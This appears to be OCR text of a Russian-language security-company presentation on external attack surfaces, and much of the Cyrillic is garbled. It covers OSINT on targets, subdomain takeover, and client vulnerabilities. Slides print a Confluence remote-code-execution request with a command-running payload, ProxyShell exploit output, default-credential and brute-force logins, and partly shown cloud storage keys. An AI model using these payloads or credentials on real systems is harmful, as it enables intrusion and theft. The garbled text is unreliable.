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AKTYyanbHOCTb UCCNEeaOBAHMUS

> 200 yTeuek B 96% oprannsauun

[Mpounsowno B Poccun 8 2023 ropy. MoxHo npeoponeTb nepmumeTp
88% cnyyaeB — B3/1IOM NEPUMETPOBbIX CANTOB M NOMACTb BO BHYTPEHHIO CETb
Conap, 2023 Positive Technologies, 2022

No 100% cnyuaes No 80% nHpacTpyKTypbl

[TpoHWKHOBEHMI Yepes BED-YA3BUMOCTH MeHsaeTcsa B TeyeHume ropa

Positive Technologies, 2022 Gartner, 2022
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LLlar 1. Cobupaem ckoyn

c6uc Y Komnaxum 2

Mockea
Cankr-Nerepbypr

KpacHopapckui kpan

ABTOCEPBUCHI, MOHKH, CTOAHKM
BesonacKocTs, oxpana

Buanec, puHancel, CcTpaxosaume, Map...

Opranusaumm
un
barkw

KoHTponupyowme oprams

* leAcTByrowme

Hepeicreyowme

lasnpom, MAO
NYKoiin, NAO
Taupep, AO (Maruur)
Arpotopr, 000

C6epbank, NMAO

"Tatveds" vm. B.[. Wawwunua, NAO

NYKoin-3anagHas Cubups, 000
lascrpoitnpom, AO

fiman CINT, OAO

la3npom Mexperuonras, 000
TK "Meranonuc”, AO

bank BTB, MNMAO

Toproeein JOM “Mepekpectok”, AO

Anpekc, 000

Pa3paboTtka KOMNbIOTEPHOro NporpaMMHOro obecnevyeHus

ewe 42 sMna AeATenpHOCTM 1 nMueH3ms

CasuHoBCKMIM ApTeM eHHaabeBuY

ewe 5 KoMnaHumn

ot 5000 ao 10000 yenosek

r. Mockea, yn. JibBa Toncroro,

ewe 11 xkoMnauui 3aperucTpupogangMo aTomy agpecy

Cemndpenno O

adv@yandex-team.ru AaBep oo '-'-,'vaeuca

ewe 2 /4 s
® yandex.ru o i

_ o -

company.yandex.ru ”;}v:--;J;;n'.'(x)rj':a q

‘ Axaexc
‘62 =% OTKpbITL NAHOpaMy

Bnapenbupl Cyabl
®OUn, MO 166 P Ucrey OrBeTumK

Ceenenus ckpoitol ¢ 12.01.23

YcraBHbiM KanuTan 16.6 mnu P % .

CBS13aHHbIEe NUua '



LLar 2. [lpoBoanm paseeaky

90% KOMNAHWI HENPABMIBLHO YNOTPEbNAIOT
TEPMMH «MOBEPXHOCTb ATAKM»

[loBepxHOCTb aTaku 3T0:

OduumanbHbie pecypchl [ pyrvue pomeHsbl, npuHagnexawme
(nomeHbl u IP-nopceTn) opraHumsaumm no whois
@ ObnayHble cepBuUChI qu Shadow IT (eHewHne xocTuHrn)

|
A g 4

Q DuwmHrosble LOMEHDI



TOM 2000 KOMNAHUNU
MMEIOT 1,6 MJTH XXUBbIX XOCTOB
22% 3ALUMLLEHDBI WAF




[lepexBaTbl nopapomeHoB

O Het poctaTouyHoro BHMMAHUSA K npobneme

[locTosiHHO pacckasbiBaem 06 yI3BUMOCTHU, HO HUKTO €€ He YCTPOHSAeT

B pyHeTte 6onee 5000 nomeHOB MOXXHO NepexBATUTb

Yasemumbl 6aHkn, KM, Tenekombl, CMI

(~) OnacHo GpULLIMHIOM U PenyTALMOHHBIMU MOTEPSIMM

axoft.ru
Y oAHOro KAMeHTA HALUNU C'T%
46 nopAOMEHOB B PAMKAX OQHOro

AOMEHd, AOCTYIMHbLIX K NepexBaTy

Domain has been assigned
Please go to the site settings and put the domain name in the Domain tab.



LLar 3. YasBumocTH, KoTopbie
Mbl Haxoaunm y sakasumkos B 2023




1 POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
2 Host: QNN onk. ru

3 Content-Type: application/x-www-form-urlencoded
! Content-Length: 866

6 queryString=
aaaaaaaa\u0027%2b{Class.forName(\u@B27javax.script.ScriptEngineManager\u027
) .newInstance().getEngineByName(\u@@827JavaScript\u0027).\u@0B65val(\ud027var+
isWin+=+java. lang.System.getProperty(\u@0220s.name\u0022).toLowerCase().cont
ains(\u@022win\uB022) ; +var+cmd+=+new+java.lang.String(\u@0221s+-1ah\u0022);v
ar+p+=+new+java.lang.ProcessBuilder();+if(isWin){p.command(\u@022cmd.exe\ud®
22,+\u0022/c\u0022,+cmd) ; +}+else{p.command (\u@822bash\u0022, +\ud022-c\u0022,
+cmd) ;+}p.redirectErrorStream(true);+var+process=+p.start();+var+inputStream
Reader+=+new+java. io.InputStreamReader(process.getInputStream());+var+buffer
edReader+=+new+java. io.BufferedReader(inputStreamReader) ;+var+line+=+\u0022\
u0022;+var+output+=+\u0022\u0022; +w\ub068ile(( line+=+bufferedReader. readlLine
())+!=+null){output+=+output+%2b+1line+%2b+java.lang.Character.toString(10);+
F\uB027) }%2b\u027

& &
N >

rootey

[+] Exchange Backend Servers:

[+]
[+]
[+]
[+]

[+] Attempting to retrieve Active

<input type="hidden" name="atl_token" value="

<input

type="hidden"

name="queryString"

drwxr=xr-x
drwxre=x=—-—
drwxre=x=——-—
drwxr=x——-

drwxr=x——-
drwxr=x—-—-
-fW=[=————
=PWX =X ==
-FW=F===
=W [
drwxXr=x———
drwxr=x———
drwxr=x—-
drwxr=x——-
-W==———
==
drwxr=x-——-—
-rW=[————

edu-exch-301 ¢
edu-exch-301.
edu-exch-301,
edu-exch-301.¢

24

N b N WS D e e WN RN WN

confluence
root

confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence

! i# python3
[+] Determining number of Exchange backend server

[ "edu

value="aaaaaaaaltotal 14M

confluence 4.0K

root

24

confluence 4.0K

confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence
confluence

exch-301!

) - version:

5

4

4.

20
133
11
6
17
K
14M
1
960
. 0K
oK
19
62
0
. 6K
. 0K
28K

5

>

Apr
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Jul
Apr
Jun
Jul
Jul
Apr
Jul
Apr
May
Nov
Apr
Jul
Apr
Jul
May
Apr
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8
7
24
22
24
8
22
22
8
22
8
7
1
24
22
24
22

24
14

15.2.792.10

RCE B 1O 3apybexxHbix BeHaOpOoB

Confluence - Gitlab - TeamCity - Apache ActiveMQ - F5 BiglP - Fortinet
VPN FortiGate) - Citrix - Juniper - lvanti EMM (Mobilelron) - vBulletin ...

03:32 .

2022 .

03:00
2020
93:11
2022
2020
2020
03:32
2020
03:30
2022
17:08
10:10
2020
10:10
2020
2022
09:44
2020

analytics-logs
attachments
backups
.bash_history]
bundled-plugins
.cache
confluence.cfg.xml
crond
docker-app.pid
en

imgEffects
index

.java

journal

lock

lock. lck

logs

. pdfbox.cache

./exchange_proxyshell.py -u https:/4

- version_short: Exchange Server 2019 (U8 MarZ21SU

- user.
5 - s1d:

NT AUTHORITY\SYSTEM
S$-1-5-18
Directory emails...

[+] Enumerated 99 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 100 possible User LegacyDNs from Active Directory

(SSL



[laponn no ymonuanuio

Request Response i
Pretty Raw Hex =] \n = Pretty Raw Hex =
1 POST /xmlpserver/services/XMLPService HTTP/1.1 : L
2 Host: D 01.08.2023 BanTne GHoncum C wela MaTimn 1 2500 0O 0 2500 Meampmcme KaGwmer rumexonora
3 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Fengen
Chrome/?S.?.2309.372 Safari/537.36 01.08.2023 117 Tecrocr g 780 q 0 780 M Na .
4 Connection: close 5 : - e Soparop
5 Content-Length: 619
6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,%*/*;q=0.8 01.08.2023 Meparrbin NDWEM BRAA-(HHEXONOA 1 1200 0 0 1200 Megnumcone Kalwser rmeexonora
7 Content-Type: text/xml yerTy™
8 SOAPAction: ""
9 Accept-Encoding: gzip 01.08.2023 Y3/ 0MOr0 CyCTasa (nneveson, 1 1200 0 0 1200 Meampmcne Y3N
10 NOXTEBOR, TAIOOEADEHHLIA, KONSHNLIN ) yCrymm
11 <soapenv:Envelope xmlns:xsi="http://www.w3.0rg/2001/XMLSchema-instance" xmlns:xsd="
http://www.w3.0rg/2001/XMLSchema"” xmlns:soapenv=" 01.08.2023 Y3 0p0ro CycTasa (NNeveson, 1 1200 0 0 1200 Meamymcame Y3IW
http://schemas.xmlsoap.org/soap/envelope/" xmlns:rep=" NOKTEBOR, TAIO6AADEHMLIA, KONGHNLINA ) ycnymm
http://xmlns.oracle.com/oxp/service/report">
12 <soapenv:Header/> 01.08.2023 MNasmonu@Time s (1 1 6000 0 0 6000 Mepmpmcone Kalwmer rmeesonora
13  <soapenv:Body> npobupxa) ycrymm
14 <rep:createSession soapenv:encodingStyle="
http://schemas.xmlsoap.org/soap/encoding/"> 01.08.2023 F131CTT (COMATOTPONMLIA rOPMOos) 1 495 0 0 495 Meanmuypmcane NaGoparopun
15 <username xsi:type="xsd:string"> ycnym
Administrator
</username> 01.08.2023 E105 MecTvase anecrenwor. Komnnexc 1 1680 0O 0 1680 Meawypmcane NaGoparopun
16 <password xsi:type="xsd:string"> 1A°i :::“M'“"'m" ycmy™
Admanistrator 01.08.2023 By TPMBEHHAR CTPYRHAN HHLOKLMA 1 630 0 0 630  Meamumcoe  Mawsnynsm MC
</password> M )
17 <domain xsi:type="xsd:string"> o =
i 01.08.2023 AR . 17 ¢ - Login Successful: postgres:amber@templatel s
</domain> (Lrodnasses) - !

Login Successful: postgres:amber@templatel
Login Successful: postgres:amber@templatelf}

SuccessTul: WORKSTATIONANadmin:admin

Login Successful: postgres:amber@templatel

Valid credentials Login Successful: postgres:amber@templatel




Ownbkn koHduUrypaumm |/
3a6biTbie ¢annbl

Yazsumbin URL.:

[-9it/

BocnpousgeaeHwe yasBUuMOCTH. //
curl =X 'GET' -d '' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9, in // )
e, br' -H 'Accept-Language: en-US' -H 'Referer: https:// | NN/ ' -H 'S¢ -
e-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.@ (Macintosh; Intel Mac 0S X 10_9_3) / /WGb.le

HTTP oteer:

/{DOMAIN}.tar.gz
J{CLIENT} zip

#YANDEX_OBJECT_STORAGE__SERVICE_ACCOUNT_KEY =
#YANDEX_OBJECT_STORAGE__SERVICE_ACCOUNT_SECRET =
#YANDEX_OBJECT_STORAGE__PUBLIC_BUCKET =

YANDEX_OBJECT_STORAGE__SERVICE_ACCOUNT KEY=C8eK
YANDEX_OBJECT_STORAGE__SERVICE_ACCOUNT SECRET=a
YANDEX_OBJECT_STORAGE _ PUBLIC_BUCKET=public.tes
YANDEX_OBJECT_STORAGE__CLIENT DOCUMENTS_BUCKET=

Ggo8




EAMHCTBEHHBbIN NYTb K 3AKPbITUIO —

00beaAnHATDb NyYluMe MHCTPYMEHTDI
N NPAKTUKM

Kaxkppbi ckaHep xopoLu Atakyiowme TexHnkm (6pytdopc OWA/IPMI)

TONbKO B CBOEM HanpasieH1N HEe BCTPAUBAIOT B KNNACCUYHECKNE CKAHEPDI

Opensource Hy>XHO YMeTb rOTOBUTb 1 day monitoring
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